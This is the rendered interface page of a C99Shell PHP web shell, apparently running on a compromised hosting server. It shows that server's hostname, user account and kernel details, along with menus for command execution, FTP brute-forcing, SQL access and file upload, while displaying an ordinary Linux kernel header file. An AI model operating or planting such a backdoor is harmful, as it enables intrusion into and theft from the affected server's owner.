!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/usr/include/linux/   drwxr-xr-x
Free 294.35 GB of 429.69 GB (68.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     kernel-page-flags.h (900 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
#ifndef LINUX_KERNEL_PAGE_FLAGS_H
#define LINUX_KERNEL_PAGE_FLAGS_H

/*
 * Stable page flag bits exported to user space
 */

#define KPF_LOCKED        0
#define KPF_ERROR        1
#define KPF_REFERENCED        2
#define KPF_UPTODATE        3
#define KPF_DIRTY        4
#define KPF_LRU            5
#define KPF_ACTIVE        6
#define KPF_SLAB        7
#define KPF_WRITEBACK        8
#define KPF_RECLAIM        9
#define KPF_BUDDY        10

/* 11-20: new additions in 2.6.31 */
#define KPF_MMAP        11
#define KPF_ANON        12
#define KPF_SWAPCACHE        13
#define KPF_SWAPBACKED        14
#define KPF_COMPOUND_HEAD    15
#define KPF_COMPOUND_TAIL    16
#define KPF_HUGE        17
#define KPF_UNEVICTABLE        18
#define KPF_HWPOISON        19
#define KPF_NOPAGE        20

#define KPF_KSM            21
#define KPF_THP            22
#define KPF_OFFLINE        23
#define KPF_ZERO_PAGE        24
#define KPF_IDLE        25
#define KPF_PGTABLE        26

#endif /* LINUX_KERNEL_PAGE_FLAGS_H */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0922 ]--